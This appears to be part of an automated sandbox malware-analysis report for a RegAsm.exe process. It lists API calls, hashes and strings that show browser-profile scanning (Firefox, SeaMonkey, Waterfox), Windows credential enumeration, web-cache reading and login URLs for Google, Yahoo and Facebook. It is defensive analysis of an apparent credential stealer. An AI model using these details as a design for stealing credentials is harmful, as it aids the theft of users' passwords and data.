                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                Control-flow Graph

                                                                APIs
                                                                • memset.MSVCRT ref: 0041249C
                                                                • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                • wcscpy.MSVCRT ref: 004125A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                • String ID: r!A
                                                                • API String ID: 2791114272-628097481
                                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                • API String ID: 2936932814-4196376884
                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                • String ID: BIN
                                                                • API String ID: 1668488027-1015027815
                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                APIs
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                • memset.MSVCRT ref: 0040BE91
                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                • String ID:
                                                                • API String ID: 697348961-0
                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                APIs
                                                                • memset.MSVCRT ref: 00403CBF
                                                                • memset.MSVCRT ref: 00403CD4
                                                                • memset.MSVCRT ref: 00403CE9
                                                                • memset.MSVCRT ref: 00403CFE
                                                                • memset.MSVCRT ref: 00403D13
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 00403DDA
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                • API String ID: 1829478387-11920434
                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                APIs
                                                                • memset.MSVCRT ref: 00403E50
                                                                • memset.MSVCRT ref: 00403E65
                                                                • memset.MSVCRT ref: 00403E7A
                                                                • memset.MSVCRT ref: 00403E8F
                                                                • memset.MSVCRT ref: 00403EA4
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 00403F6B
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                • API String ID: 1829478387-2068335096
                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                APIs
                                                                • memset.MSVCRT ref: 00403FE1
                                                                • memset.MSVCRT ref: 00403FF6
                                                                • memset.MSVCRT ref: 0040400B
                                                                • memset.MSVCRT ref: 00404020
                                                                • memset.MSVCRT ref: 00404035
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 004040FC
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                • API String ID: 1829478387-3369679110
                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                APIs
                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                • API String ID: 3510742995-2641926074
                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                • free.MSVCRT ref: 0041848B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorFileLastfree
                                                                • String ID: |A
                                                                • API String ID: 981974120-1717621600
                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                APIs
                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                • memset.MSVCRT ref: 004033B7
                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                • String ID: $0.@
                                                                • API String ID: 2758756878-1896041820
                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 2941347001-0
                                                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                APIs
                                                                • memset.MSVCRT ref: 00403C09
                                                                • memset.MSVCRT ref: 00403C1E
                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                • wcscat.MSVCRT ref: 00403C47
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • wcscat.MSVCRT ref: 00403C70
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcscat$wcscpywcslen
                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                • API String ID: 2489821370-1174173950
                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                APIs
                                                                • memset.MSVCRT ref: 0040A824
                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 669240632-0
                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                APIs
                                                                • wcschr.MSVCRT ref: 00414458
                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                • String ID: "%s"
                                                                • API String ID: 1343145685-3297466227
                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                • API String ID: 1714573020-3385500049
                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                APIs
                                                                • memset.MSVCRT ref: 004087D6
                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                • memset.MSVCRT ref: 00408828
                                                                • memset.MSVCRT ref: 00408840
                                                                • memset.MSVCRT ref: 00408858
                                                                • memset.MSVCRT ref: 00408870
                                                                • memset.MSVCRT ref: 00408888
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 2911713577-0
                                                                APIs
                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID: @ $SQLite format 3
                                                                • API String ID: 1475443563-3708268960
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmpqsort
                                                                • String ID: /nosort$/sort
                                                                • API String ID: 1579243037-1578091866
                                                                APIs
                                                                • memset.MSVCRT ref: 0040E60F
                                                                • memset.MSVCRT ref: 0040E629
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Strings
                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
